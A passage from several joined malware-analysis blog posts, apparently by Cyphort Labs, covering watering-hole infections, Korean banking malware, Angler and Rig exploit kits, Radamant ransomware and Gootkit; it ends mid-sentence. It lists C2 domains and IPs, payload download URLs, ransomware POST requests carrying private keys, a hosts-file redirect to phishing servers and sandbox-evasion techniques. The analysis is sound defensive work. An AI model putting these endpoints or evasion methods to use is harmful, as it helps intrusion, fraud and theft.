^{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)}

^{Accept-Encoding: gzip, deflate}

^{Host: counter.yadro.ru}

^{Connection: Keep-Alive}

Additional details:

Creates mutex with the following name:

•  _HSJ909NJJNJ90203_

Connects to the following urls to get geolocation of the victim’s machine.

• www.telize.com/geoip

 If it detects that it is running on a 64-bit system, it will load its 64-bit counterpart that is found in its resource.

Downloaded Component

Family: Backdoor.Ruperk

[SHA1:] BD16D28FEECC00A744BFED06AB70C918FEE404C3

[MD5:] 7a6229f6afe767009fe22a119c4165a1

This file is downloaded from the following link:

• http://clenodium{.}eu/tmp/file{.}exe

When executed, it drops a copy of itself in %LocalSettings%\ApplicationData\{random}\{random.exe}

It creates a new process of wuauclt.exe and injects into it.  It contacts the following CnC server and wait for commands:

• dobavki-shop.com

Network Connection

GET /getter.php?mode=reg&id=xxxxx80-d14e-49fe-9c0a-1af5058475e7&os=5132&vga=VMware%20SVGA%20II&ocl=0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: dobavki-shop.com

Connection: Keep-Alive

 

Apparently from the above CnC request, it sends system information in clear text, including:

• MachineGuid
• OS version
• Display device (monitor) name

It waits for the following commands from the server.

• #none – do nothing
• #stop
• #update – update self
• #update_miner
• #opencl
• #destruct – kill self
• #error
• #download  – Download files

The server evaluates the information received from the infected computers and replies back with any one of the above listed commands. When the trojan is executed in a virtual environment (or sandbox) it chooses to stay low and replies with command #none.

 Through our chain heuristics and browser cooker engine, we discovered that several other forum sites are also infected with this same malicious attack.  These forum sites are powered by vBulletin  or by IP Board.

Early this year, Sucuri blog reported a serious vulnerabilty affecting vBSEO that allows an attacker to remotely execute malicious PHP code on your website. vBSEO is a component of vBulletin but it was already discontinued due to several vulnerabilities. The sad fact is that some websites still use it. 

For website administrators affected by this attack, Sucuri posted the following options:

1. Completely remove vBSEO from your site – It is not supported anymore
2. Apply the patch recommended by the vBulletin team
3. Put your site behind a Website Firewall, this will prevent the exploitation of this vulnerability and many others.

 For visitors of forum sites, ensure that you are running the latest version of browsers and flash as this attack involves IE and flash exploits.

Connecting Dots

For the curious threat researchers out there, you may wonder why the armored malware completely avoided all three popular virtualization environments (VirtualBox, Qemu, and Vmware), not even Vmware which is a fairly popular platform adopted by many businesses?  Indeed Cyphort Labs have seen malware samples which singled out VirtualBox and Qemu for evasion, but was happy to play inside Vmware.  In those cases, the objective of armoring design seems to be anti-analysis or anti-sandboxing.  As we have mentioned earlier, this malware campaign has targeted over a hundred forums which seem to be serving mostly individual home users. As we saw from the attack payload (TrojanClicker.FleerCivet) earlier, it is part of a click fraud campaign.  For a click fraud to look legitimate, it better come from home users, so how many home users’ machines would actually run VirtualBox, Qemu, or Vmware?  Very few.  So we believe that this malware pack is designed for click fraud campaign and for distribution using watering hole attacks.  The armoring against all the virtualization environments is done to avoid detection by anti-click-fraud systems.

 Special thanks to Alex Burt, McEnroe Navaraj, Palaniyappan Bala, and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post DIY Chatroom and over a hundred forums injected with malware appeared first on Cyphort.

Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia. Due to an ongoing investigation, we will keep the company name anonymous. The source said, initial entry of the attack is a spear phishing email sent to one of the employees. The attack involves multiple backdoors and info-stealing trojans. Some of the malware exhibits anti-sandbox properties and includes protection against heuristic signatures commonly used by anti virus companies. The various malware samples also show a common theme, like installing themselves in the %ProgramFiles% or in the %UserProfile% folder depending on whether the user has admin privileges or not. Additionally, the majority of the malware samples are compiled with Borland Delphi with their strings encrypted and API strings either obfuscated or divided into several strings as protection against heuristic signatures. None of the samples are packed except for one.

Based on the file creation date of the files, it appears the attack started as early as January 2015 and lasted for three months. 

Summary of samples used in this attack

Technical Analysis

GoogleUpdate.exe

The file structure of the file is not common as we see on prevalent malware today. Why? because most AV products today employ heuristic based detection that detects packed samples and samples with an uncommon file structure. This malware is not packed and sections resemble a normal file.

Strings are encrypted and will only be decrypted right before use.  The malware also divides its APIs into several strings. This is also to avoid heuristic signatures that detect strings and suspicious APIs.

It drops a copy of itself in %Pr0gramFiles% folder if user is admin and %UserProfile% folder if not

If admin:

• %ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

If not admin:

• %UserProfile%\Applications\GoogleUpdate.exe

It installs itself as a service with a service name of “SENSS”.  

After checking that it is successfully running as a service, it checks if the parent process is explorer.exe or iexplore.exe . If so, it will load its dll file from its data section. This dll is encrypted via XOR with 0x89 as key. Otherwise, it will enumerate processes and find services.exe and injects its dll.

Anti-Sandbox

Detects Sleep Acceleration

To defeat a sandbox, this malware delays execution  through sleeps or loops because it knows a sandbox system will execute the the malware for a short limited amount of time. By contrast, once inside your system, the malware has the luxury of time to perpetrate its malicious intent. To defeat this, sandbox systems employ acceleration, that is if they detect that a sample uses a delay, it will accelerate it. For example, if it detects the sample sleeps for 1 minute it will change it to sleep for 1 second. Unfortunately, for this malware, this technique will not work. It is able to detect sleep acceleration by issuing a sleep and gets the time elapsed after that and checks if the  time elapsed is lower than the time of sleep.

Detects API hooks

Sandbox systems also hooks APIs to tell the behavior of a file. This malware detects hooks by checking if the first instruction of a certain API is a jmp, call or a push-retn. It checks if the start byte of an API address is either of the following bytes:

• E8
• E9
• EB
• FF
• 68????????C3 (push retn)

Payload

The injected code is a backdoor that communicates to the following C&C servers:

• bbs.gokickes.com:80
• img.lifesolves.com:8080
• domain.gokickes.com:443

Depending on backdoor commands, this malware is capable of the following

• Download and execute additional files 

• Capture Screenshots
• Capture Mouse and keyboard events

• Update itself
• Opens remote shell
• Terminate Process
• Enumerate Network Shares
• Enumerate Drives
• Uninstall itself

Lastly, all data sent and received from server is encrypted with XOR key 0xD5

mslives.exe

This sample has similar file structure as GoogleUpdate.exe but it doesn’t employ similar anti-sandbox tricks.

When first ran, it sleeps for 300 seconds before doing its installation routine.  Afterwards, it creates a copy of itself as follows:

• %ProgramFiles%\Windows NT\Accessories\Microsoft\mslives.exe

The copy however as written with large garbage of data at the end of the file that balloons its file size to more than 100MB. It writes to this file 100KB of data 1000 times. There are two things this behavior tries to evade sandbox. First,  this malware however does not create a copy of itself technically which makes this malware’s behavior unusual and may appear to sandbox as benign behavior. The usual malware behavior is to create an exact copy of itself. Second, the multiple writing event might exceed the sandbox limit and the file size of the dropped copy will make it unsuspecting for the sandbox.

It executes its dropped copy using CreateProcess then checks if it is running as iexplore.exe, if not, it will create a suspended process of iexplore.exe and injects its code into it by overwriting to iexplore.exe’s main module.

It creates a hidden windows with window name and class name “111111”. 

It then creates an autostart registry entry below to let it run at every startup.

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Valuue: msliveupdate
  • Data: %ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe

Payload

This sample has only one purpose and that is to download and execute a file downloaded from forum.energymice.com.

_{GET /view/login.asp HTTP/1.1}

_{Content-Type: */*}

_{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)}

_{Host: forum.energymice.com}

_{Cache-Control: no-cache}

It downloads the file in the %TEMP% folder and executes it. Unfortunately, at the time of our analysis, the download URL is not returning any binary.

winhost.exe

Unlike the other files this one is clearly packed. PEiD identifies the packer as follows:

• ASProtect 1.2x – 1.3x [Registered] -> Alexey Solodovnikov

This file is a backdoor named “HDOOR” as we found this string in its body. We also found other interesting strings which indicates the protector used.

• HDoor, Version 1.0
• Copyright (C) 2013
• (c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com.

This is a backdoor  that listens to port 143 and waits for the client to connect and issue commands. Port 143 is the default IMAP non-encrypted port. IMAP or (Internet Message Access Protocol)  is a mail protocol used for accessing email on a remote web server from a local client.

It checks if the user is admin or not.  If the user is admin, it will install itself as a service and drops a copy in the following directory:

• %ProgramFiles%\Common Files\System\NT\lib\winhost.exe

If the user is not admin, it will install itself as follows and creates an autostart key entry in the registry.

• %USERPROFILE%\System\winhost.exe

Autostart Registry Entry:

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Value: Microsoft Messenger
  • Data: %USERPROFILE%\System\winhost.exe

Payload

It is capable of performing the following depending on the attacker’s command.

• Disconnect
• Get backdoor install path
• List directory or files
• Type a txt file content
• Execute A Program
• Download A File
• Get A CMD Shell
• Exit CMD Shell
• Upload a file
• Download a file
• Load dll library
• Free dll library

nethost.exe

Install a copy of itself as follows depending if the user is admin or not:

If user is admin:

• %ProgramFiles% \common files\system\library\nethost.exe

Installs itself as a service:

• HKLM\System\CurrentControlSet\Services\ncoglsse
  • DisplayName = Microsoft Wireless Device Service
  • ImagePath = %ProgramFiles% \common files\system\library\nethost.exe

If not admin:

• %USERPROFILE% \system\library\nethost.exe

It creates the following autostart key

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Value: “ncoglsse”
  • Data: %ProgramFiles%\common files\system\library\nethost.exe

After installation, it will inject to lsass.exe to stay memory resident and execute its payload.

Payload

It downloads from the following URLs

• http://hud321.astringer.com/images/log.gif
• http://grop.waterglue.org/images/logg.gif
• http://hud.astringer.com/images/log.gif

The content of the downloaded files are encrypted URLS that it uses to connect to its C&C. The malware connects to this URL using HTTP POST and sends the following information.

• IP address
• Language ID
• Malware version
• OS version
• Machine name

It receives commands from the C&C and it is capable of the following:

• Collect information about the drives and folders on your PC
• List Files

• Download files
• Terminate Processes
• Open CMD shell

Shell64.dll  

Shell64_u.dll – Loader Component

The loader component runs as a service, loading the espionage component and makes sure the infection keeps intact. The service, including the service name, is to be configured by the malware dropper, which is not known at the time of writing. Strings embedded in the loader component suggest the binary is packed with the Dyamar binary protector, but the binary does not leave the impression of being thoroughly protected.

Simple obfuscation elements, induced by macros and a number of obfuscated strings show attempts of complicating the analysis but are easily bypassed. Also the binary comes with three dummy exports, which show more of the obfuscation elements. Interestingly, the binary keeps a log file, located under C:\debug.txt, where debug messages are written to. This is rather uncommon for binaries found in the wild.

The ServiceMain method will direct execution to one of the exports, either ‘LoadFunc’ for Windows OS versions below 6.0, or to ‘win7load’ for 6.0 and above. Said exports load the espionage component, running it via a spawned rundll32.exe process with the according parameters set. This second stage binary exports two functions, ‘main’ and ‘lowmain’, which are again suited for OS versions below and above 6.0.

Shell64.dll – Espionage Component

The espionage component comes with the internal name ‘Server.dll’. It exports the functions ‘main’ and ‘lowmain’, where main serves OS versions 6.0 and above, while lowmain serves versions below 6.0. Just like the loader component this binary creates and maintains the file C:\debug.txt where debugging information is written to.

During startup shell64.dll creates a named mutext, dubbing it ‘Global\\KongQi [TickCount]’, where TickCount is the actual time stamp at the time of infection. Also the malware creates a named view which is used to exchange runtime information among threads and intruded processes, dubbed ‘_kaspersky’. The name is doubtlessly chosen to add stealth.

During startup the malware gathers information about the infected system and sends it to its remote server. The information includes:

• Hostname
• System CPU power
• OS version
• Drive geometry for PHYSICALDRIVE0
• Global memory status
• Video capture driver description
• Installed security products based on running processes list

Security Product Enumeration

The list of products to be searched for is long:

The following firewall installations will also be enumerated:

• Norton Personal Firewall        
• ZoneAlarm                       
• Comodo Firewall                 
• eTrust EZ Firewall              
• F-Secure Internet Security      
• McAfee Personal Firewall        
• Outpost Personal Firewall       
• Panda Internet Seciruty Suite   
• Panda Anti-Virus/Firewall       
• BitDefnder/Bull Guard Antivirus
• Rising Firewall                 
• 360Safe AntiArp

Espionage Capabilities

Once the malware is all set up and running it waits for instructions from the remote servers. Its capabilities are plenty, and are all designed to steal data from the infected system. Spied information is compressed with the deflate algorithm and sent to a remote server. A list of analyzed functions is as follows:

• Video Captures using a capture window named CVideoCap while compressing the video using the Windows VCM API (Video Compression Manager)
• Sound captures from the system’s sound input device, i.e. microphone
• Stealing data from the current desktop’s clipboard, which can yield passwords from password managers
• Capture screenshots and compress them, exfiltrate as a stream
• The sample includes a userland keylogger, setting a global Windows hook via SetWindowsHookEx to listen for keyboard events, which are parsed through Windows IMM API (Input Method Manager); keystrokes are dumped to a file named ‘jpjl.dat’, created within the Windows system directory
• Clear event logs for ‘Application’, ‘Security’ and ‘System’, which is usually done to erase forensic evidence of an intrusion
• Shut the system down, which eventually forces a reboot
• Create a local user account with the description ‘This user account is used by the Visual Studio .NET Debugger’
• Download files and execute them
• Execute other binaries from disk
• Enumerate files and file attributes on the system, modify and deletie files and directories
• Enumerate window names of opened applications
• Enumerate system attributes like OS version, CPU power or memory capacities of the disk, system up time, number of processors, names of running processes while matching for security products, computer name, user name of current user, attached drives

• Enumerating parameters for dial-up connections, such as phone number and device name
• Enable terminal services and allow remote connections
• Pop message boxes
• Open a socket for sending and receiving data
• Delete its files and persistence mechanisms from the machine, i.e. uninstall the service and remove an auto-run registry key located under [HKLM]\..\CurrentVersion\Run named ‘MSLiveMessenger’; it is unclear though, how this key is created in the first place

Persistence Methods

The binaries are designed to run in the context of a Windows service, which is assumed to be set up by the according dropper. The service name remains unclear, as it is also set by the dropper. However, the malware comes with the capability to inject its payload to remote processes and contains a function to inject to winlogon.exe (in Windows versions prior to 6.0).

dllhost.exe

This malware does not do much. It only tries to download from blog.softfix.co.kr:80.

Who’s behind?

The attacker used C&C servers that are registered in Korea with registration records looking fake. Some of the C&C servers are also owned by hugedomains.com which is a company that sells previously owned domains and have a service that hides the information. We also noticed that based on the strings in the binary, it’s clear that it does not come from native English speaker.

Whois Records of C&C used

Malware doesn’t need to be advanced to be effective

These malwares are not advanced and they are also the family of malware we have seen before yet they were able to infiltrate and bypass security. The malware were able to reside unnoticed for three months which gives the attacker plenty of time to operate. This proves that malware doesn’t need to be advanced or sophisticated to be able to get through.  

AV is still our best defense, they block majority of security events, it’s just that there are too many malware attacks with various techniques that there is no single security security solution that will stop all these attacks. That is why we need multiple security solutions and we need security people in our respective organizations.

Why spear phish?

The initial entry of the malware is a spear phishing email that targets one of the head of the company.  According to a report from TrendMicro, spear-phishing is still the most favored APT attack bait. They said that “APT campaigns frequently make use of spear-phishing tactics because these are essential to get high-ranking targets to open phishing emails. “

It is easy for the attacker to guess email address of people  in organization especially if they are high-ranking officials as their names are available online. The attackers can easily profile them by searching any available info online. This makes the attacker customize their attack according to the profile of the target.

As proven, attackers usually target the weakest point and more often, the weakest point is the people in our organization. This is a message that to protect our organization, we must also educate and train all the people within our organization for proper security practices so as not to fall with these types of social engineering attacks.

Special thanks to Marion Marschalek and the rest of the Cyphort Labs team for their help in analysis of this attack. 

The post Multiple Malwares used to Target an Asian Financial Institution appeared first on Cyphort.

On September 18, 2015, we saw an activity on koreatimes.com where we captured a malicious binary. We investigated further and found that this campaign is specifically targeted to Korean sites and Korean banks. 

We looked at our logs for this year and found more Korean websites infected:

• koreatimes.com (Sep. 18, 2015)
• filehon.com(May 30, 2015)
• joara.com (May 3, 2015)
• hometax.go.kr (May 3, 2015)
• soriaudio.co.kr (April 23, 2015)
• gomsee.com (March 16, 2015)
• lottoplay.co.kr (Feb 6, 2015)
• insight.co.kr (Jan 31, 2015)
• filecity.co.kr (Jan 23, 2015)
• nggol.com(Jan 6, 2015)
• koreamanse.com(Jan 6, 2015)

The payload we got also specifically targets Korean banks by modifying the infected systems hosts file to redirect traffic from Korean banks to its controlled server. This means the attacker can craft a phishing website without the user knowing it is visiting a phishing site. It also targets Ahnlab by killing processes and deleting files specific to the software. Ahnlab is a popular antivirus software in South Korea.

                                                              Infection Flow

Website Infection

This following analysis will focus on the infection that took place in koreatimes.com

The culprit is a javascript file named “2013_gnb.js” which is an iframe injector leading to KaiXin EK landing page.

It exploits the following vulnerabilities:

• CVE-2014-6332 (IE)
• CVE-2011-3544 (Java)
• CVE-2015-0336 (flash)

We found interesting strings on the flash file which gives us an idea about the attackers platform on building its exploit and references to the attacker. Also an interesting string “King Lich V” was found on the flash file which  is likely the author’s signature. That string was found also found in other attacks involving Chinese group. Flash file was also packed using DoSWF.

Once the exploitation is successful, it has two options to execute its payload.  If it is running in Windows 7 or 8, it will fire a powershell script that will download an executable file from 199[.]188[.]106[.]161.

Else, it executes a shellcode that downloads from “www[.]jfkdsajfk5263[.]com/server[.]jpg”. The former was basically used to bypass DEP

The binary downloaded is a banking malware with backdoor capabilities under the family of Venik.

Backdoor Venik

“Venik” is a Russian word for a besom, or broom, used in Russian bathhouses.

The binary downloaded is actually dropper which when executed installs a dll file in C:\{random} folder using random name like “c:\tqcsv\krxxc.rxk”. It executes this dll as:

• “%system32%\rundll32.exe” “c:\tqcsv\krxxc.rxk”,Start

Creates mutex (M142.0.137.66:3201) and creates autostart key entry such as:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • EvtMgr – “c:\windows\system32\rundll32.exe “c:\tqcsv\krxxc.rxk”,Start”

After installation, it beacons out to its server by contacting the following urls:

• http://142[.]0[.]137[.]68:803
• http://142[.]0[.]137[.]67:805/index.php

It also opens a connection to 142.0.137.66 using TCP port  3201 and waits for a command from the server. The server can issue a command that starts a remote access service from the infected client.

It also collects files from %ProgramFiles% folder and mapped drives. It copies the files to a random file in C:\ using xcopy  and uploads the file to its server using an HTTP session.

It modifies the hosts file (%system32%\drivers\etc\hosts) and adds the following lines. It effectively redirects the users visit of banking sites to a site controlled by the attacker which is actually a phishing site:

142.0.137.199 www.shinhan.com.or
142.0.137.199 search.daum.net
142.0.137.199 search.naver.com
142.0.137.199 www.kbstar.com.or
142.0.137.199 www.knbank.vo.kr
142.0.137.199 openbank.cu.vo.kr
142.0.137.199 www.busanbank.vo.kr
142.0.137.199 www.nonghyup.com.or
142.0.137.199 www.shinhan.ccm
142.0.137.199 www.wooribank.com.or
142.0.137.199 www.hanabank.ccm
142.0.137.199 www.epostbank.go.kr.or
142.0.137.199 www.ibk.co.kr.or
142.0.137.199 www.ibk.vo.kr
142.0.137.199 www.keb.co.kr.or
142.0.137.199 www.kfcc.co.kr.or
142.0.137.199 www.lottirich.co.ir
142.0.137.199 www.nlotto.co.ir
142.0.137.199 www.gmarket.net
142.0.137.199 nate.com
142.0.137.199 www.nate.com
142.0.137.199 daum.com
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.zum.com
142.0.137.199 zum.com
142.0.137.199 naver.com
142.0.137.199 www.nonghyup.com
142.0.137.199 www.naver.com
142.0.137.199
142.0.137.199 www.nate.net
142.0.137.199 hanmail.net
142.0.137.199 www.hanmail.net
142.0.137.199 www.hanacbs.com
142.0.137.199 www.kfcc.co.kr
142.0.137.199 www.kfcc.vo.kr
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.kbstir.com
142.0.137.199 www.nonghuyp.com
142.0.137.199 www.shinhon.com
142.0.137.199 www.wooribank.com
142.0.137.199 www.ibk.co.kr
142.0.137.199 www.epostbenk.go.kr
142.0.137.199 www.keb.co.kr
142.0.137.199 www.citibank.co.kr.or
142.0.137.199 www.citibank.vo.kr
142.0.137.199 www.standardchartered.co.kr.or
142.0.137.199 www.standardchartered.vo.kr
142.0.137.199 www.suhyup-bank.com.or
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.kjbank.com.or
142.0.137.199 www.kjbank.com
142.0.137.199 openbank.cu.co.kr.or
142.0.137.199 openbank.cu.co.kr
142.0.137.199 www.knbank.co.kr.or
142.0.137.199 www.knbank.co.kr
142.0.137.199 www.busanbank.co.kr.or
142.0.137.199 www.busanbank.co.ir
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.suhyup-bank.ccm
142.0.137.199 www.standardchartered.co.kr

                               Host File Modification

The phishing site asks for sensitive information that are not usually ask during a normal online banking session. 

There are also times that it will ask the user to visit other banking sites leading to phishing sites. This happens when it is likely that the phishing site does not currently support a bank.

Adding to its attack on Korean related services, it tries to disable Ahnlab related files and process. Ahnlab is a popular antivirus software in South Korea.

As of September 25, we verified that koreatimes.com is clean from this infection.

Related Samples

Credits to Alex Burt for his help in discovery of this  infection.

The post Infected Korean Website Installs Banking Malware appeared first on Cyphort.

 On October 26, 2015, Cyphort Labs discovered that psychcentral[.]com has been compromised and is currently infecting visitors via drive-by-download malwares. We immediately contacted psychcentral about this infection as early as we have discovered it. As of October 29, their technical team identified the problem and addressed the issue. Psychcentral[.]com is a leading independent metal health social network. It receives about 163,846 unique visitors per day.

The site was infected with an iframe injector that redirects to  Angler EK. It uses a flash exploit that targets the recent vulnerability in Adobe flash. We found it to be installing bedep and vawtrak. Bedep was known to be the notorious ad fraud malware and vawtrak is a banking trojan following the success of Zeus. We have seen Angler to be using bedep as its payload  but adding vawtrak in its arsenal is something we haven’t seen in the past until recently. Moroever, the vawtrak sample we got downloads a new memory scraping malware that scans for credit card data in memory. This is typical of Point Of Sale malware like the ones that affected Target stores.

Infection Chain

The iframe injection originates from an Ad server script that is using Open AdStream (OAS).
The script makes a request to oascentral[.]spineuniverse[.]com which leads to a function OAS_RICH() responsible for injecting iframes on the web page.

Ad server script injecting iframe

The webpage finally leads to Angler EK landing page on margueriteyellow[.]bitcoininvesting[.]net. It uses a flash exploit that targets the following vulnerability:

• CVE-2015-5560, Adobe Flash Player versions prior to 18.0.0.232 on Windows and OS X.

The said vulnerability was already patched on 18.0.0.232 flash update.

network activity during infection

Payloads

We were able to obtain 3 executable payloads from this infection:

• a2ee0c22d0cbdaa1c8de45c4a487b96a – Bedep
• 28639b2c93a24ed6d178f3098ca23f2e – Vawtrak
• a1d1ba04f3cb2cc6372b5986fadb1b9f – POS malware

Bedep

As we have seen in the past, bedep’s  function is to execute Ad fraud campaigns. It usually arrives encrypted over the network to protect itself against traditional IDS/IPS solutions. It resides in the system as a dll file, usually in %PROGRAMDATA% folder. It also creates a folder using the machine GUID and drops itself there.

Vawtrak

Vawtrak (aka Neverquest) is a rising star in the field of financial trojans. It was first discovered in-the-wild in 2013. It arrives using several methods, usually via exploit kits, or as an attachment to spam email, or downloaded by macro malware embedded in Microsoft Office documents and spreadsheets.

It employs similar functions used by Zeus, like using webinjects to collect confidential  banking information and hooking APIs to intercept browser traffic. It also downloads an encrypted configuration which contains URLs it targets to inject.

It also contains a list of download URLs that points to its additional modules. The sample we obtained has the following download links in its config:

Vawtrak Config file snapshot

Samples downloaded from 176[.]99[.]11[.]154 are its additional modules. One interesting url is http://46[.]30[.]41[.]16/files/970.exe which is a downloader of a new RAM-scraping malware akin to the ones used in typical POS malware as described in a Cyphort Special Report.

Vawtrak resides in the system as a dll file in the %PROGRAMDATA% using random names such as:

• C:\ProgramData\Nuxbu\Zuzhot.dll

It creates a run key using regsvr32.exe to execute the DLL. e.g.,

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Value:{FFCF9B6F-7C01-4D05-9D5E-7F8BDD6E0481}
  • Data:regsvr32.exe “C:\ProgramData\Nuxbu\Zuzhot.dll”

It downloads its configuration file from:

• http://ninthclub.com/Work/new/index.php

RAM scraping malware

Vawtrak downloads and execute  “970.exe ” which then downloads a dll component from from 91.234.34.44 via TCP port 30970. It saves this as follows:

• %ALLUSERS%\Application Data\{random}.dll

It then downloads additional file via HTTP Get from:

• 50.7.143.61/a_p/a_970.exe

And saves it as:

• %ALLUSERS%\Application Data\taskhost.exe

taskhost.exe scans for every running process and check the memory for credit card information. If it finds such a process, it creates a new thread that checks for track 1 and track 2 data:

process enumeration to scrape credit card data

It specifically checks for credit cards that starts with 3, 4, 5, or 6 which means cards like AMEX, Visa, MasterCard, Diners Club, Discover, etc.

track 1 and track 2 checking

We see in this infection how cybercriminals use multiple infection methods. Exploit kits are usually packaged to target multiple software with vulnerabilities to increase their coverage. We have reports how angler generates $34 Million annually from ransomware alone. We see in this infection that the group is after the money. We are not sure how much money are they raking in. Bedep and Vawtrak targets consumers while the RAM scrapping malware targets POS systems. One thing is for sure, the group behind this are looking to cash in.

Special thanks to Alex Burt and the rest of Cyphort Labs for their help in discovering and analyzing this infection.

The post Psychcentral.com infected with Angler EK: Installs bedep, vawtrak and POS malware appeared first on Cyphort.

A new ransomware called Radamant has been discovered in early December 2015. On December 31, we found compromised websites redirecting to Rig Exploit Kit and downloading this ransomware. The following sites have been infected:

• www.yatra.com
• www.herbeauty.co

Infection Chain on yatra.com

Infection Chain on herbeauty.co

On the affected page, a malicious html code was injected at the end of the page. The code displays a malicious flash file that redirects to Rig EK landing page.

Injected Code

As of this writing the said websites are now free from infection.

Flash Exploit

The Rig EK on both sites uses the same flash exploit and also delivers the same payload. The flash exploit targets the following vulnerability:

• CVE-2015-5560

This is an old exploit which affects versions 18.0.0.209 and below. The exploit was patched on August 15, 2015 via Adobe flash player update 18.0.0.232. After exploitation, it will download its payload.

Radamant Ransomware

This is a new breed of ransomware that encrypts files using AES-256 encryption. Bleepingcomputer.com provides an excellent coverage of this ransomware. This malware was also found to be leased as a kit on private  malicious sites. It costs $1,000 to rent it for one month or potential buyers can test it for 48 hours for $100 USD.

Source: http://www.bleepingcomputer.com/news/security/radamant-ransomware-kit-for-sale-on-exploit-and-malware-sites/

As early as December 14, people have been complaining  on bleepingcomputer forum that  their files encrypted and renamed with .RDM or .RRK extension. This malware scans all files that match certain extensions and encrypts them using a unique AES-256 key for each file. The  generated AES-256 key is then encrypted with a Master key which is then embedded into the target file.

Network Connections:

The malware will first issue a POST request to its CnC server http://cutenaskare.com/domains.php to get possible domain/s

             POST http://cutenaskare.com/domains.php

             Server Reply: [7:cutenaskare.com]

Then it will POST to http://cutenaskare.com/API.php together with its ID and IP address to check if it is already registered in the server

              POST http://cutenaskare.com/API.php  id={machine fingerprint}&ip={victims IP address}

               Server Reply: [0:unknownID][6:{IP region e.g., RU}]

If the victim is new it will reply with [0:unknownID] which instructs the bot to register and post additional system information.

               POST http://cutenaskare.com/API.php   id={machine fingerprint}&apt=0&os={OS version}&ip={victims IP address}&bits={32 or 64 bit}&discs={Drive Letters}&pub={public key}&prv={private key}

               Server Reply:[r:good]

The server will send its public key and the malware will POST to:

              POST http://cutenaskare.com/mask.php

The server replies with a list of extensions to encrypt which also triggers the start of encryption. After the malware is finished encrypting files, it will show the following page informing the user that files have been encrypted and instructing the victim to pay .5 Bitcoin (approx 220 USD).

Luckily the malware’s encryption had some flaws which allows  Fabian Wosar to recover the encrypted files without paying the ransom. 

Fabian’s tool can be downloaded from the following link:

• emsi.at/DecryptRadamant

The tool has been updated to support the latest version known. It is also evident that the malware author/s aren’t pleased with Fabian as they placed some cursed strings on their code in the latest version.

The first version of radamant was first seen on virustotal.com on Dec 3, 2015 and we have identified 3 versions to date.

Indicators of Compromise

Mutex Names:

Radamant_v1_Klitschko_number_one

Radamant_v2_Klitschko_number_one

\Sessions\1radamantv2_emisoft_fucked

Install Path:

C:\Windows\DirectX.exe

Registry Keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

      Value:svchost or DirectX

      Data: C:\Windows\directx.exe

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

      Value: svchost or DirectX

      Data: C:\Windows\directx.exe

The post Radamant Ransomware distributed via Rig EK appeared first on Cyphort.

On January 27, 2016 Cyphort Labs discovered a site infected with Angler EK leading to a fileless Gootkit (a.k.a. XswKit) malware. The site was redirecting visitors to the malware through a compromised OpenX Ad server injecting a malicious iframe into the page. The iframe leads to Angler EK which downloads Bedep ad-fraud which then downloads a Gootkit loader. 

The loader injects a DLL component found in its body into explorer.exe. The injected DLL then downloads the fileless Gootkit and saves it in the registry as binary data,  then loading it in memory only.

Infection Chain

The compromised site is a Romanian broadcasting company, www.tvr.ro. The chain starts from bannere.tvr.ro making HTTP request to OpenX Ad server which will inject an iframe to the webpage. It appears that the OpenX Ad server was infected, specifically the file /openx/www/delivery/ajs.php. In previous years, there have been reports of a vulnerability in OpenX software which will allow the attacker remote code execution and code injection. We believe that this is likely the case here but we are not sure if this is a new vulnerability or an old one.

The iframe leads to  Angler EK which makes use of a flash exploit, CVE-2015-5560. The flash exploit downloads Bedep ad-fraud malware which will download the Gootkit loader. 

Gootkit Loader

This executable is saved in the %windir% folder with a random numbers as the filename e.g. 2144874235-50823412.exe. It is a packed executable where most of the packed data is in its .rsrc section.  After unpacking, it unwraps a DLL component found in its .data section and injects it into the explorer.exe process.

The unpacking of the DLL uses some custom decryption algorithm. After unpacking, it searches for explorer.exe process and inject the dll. There are two ways it can inject to explorer.exe: either using CreateRemoteThread or modifying the process’s main thread using ThreadContext APIs. Then it terminates itself.

Injected DLL

The injected dll is the main malware routine. Its main purpose is to download additional malware from a set of domains and save the downloaded malware as a binary data in the registry. It first checks for its execution environment which it also uses to initialize its variables. It also set an environment variable “vendor_id” with value  “unstable_2380”. The unstable value might mean this is an unstable version which could mean it is still under development. It then creates five threads, each with a different task.

The first 2 threads are responsible for downloading file-less malware while the third and fourth thread are responsible malware update. The fifth thread is a “kill-self” mechanism which is triggered by the presence of uqjckeguhl.tmp in the %TEMP% folder.

First & Second Threads

The first thread is responsible for injecting code into the current process. It starts by waiting for an event triggered by the second thread. Once that event is triggered, it will inject the code downloaded by the second thread to the current process, which in this case is explorer.exe.

The second thread connects to the following domains via SSL: 

• karlsadovnik75[dot]com
• karlsasyxushee75[dot]com
• karlsasyn725[dot]com
• karlsadroch27[dot]com
• karlsamochux2[dot]com
• karlsabrero22[dot]com
• karlsalomun9[dot]com
• karlsaranu82[dot]com
• karlsardabale9[dot]com

It uses HttpOpenRequest to make a request for SSL connections by setting the dWflag to 0x84800300, which sets the flag for INTERNET_FLAG_SECURE.

By using SSL, it is able to add a layer of protection for its network traffic. However, it appears that the certificates from these domains are not trusted. In order to bypass it,  it uses InternetQueryOption and InternetSetOption to set the INTERNET_OPTION_SECURITY_FLAGS to ignore invalid certificates.

The return of InternetQueryOptionA is ORed with 0x7380 which sets the following flags. In effect, it will ignore the untrusted certificates and ignore the redirect to https:

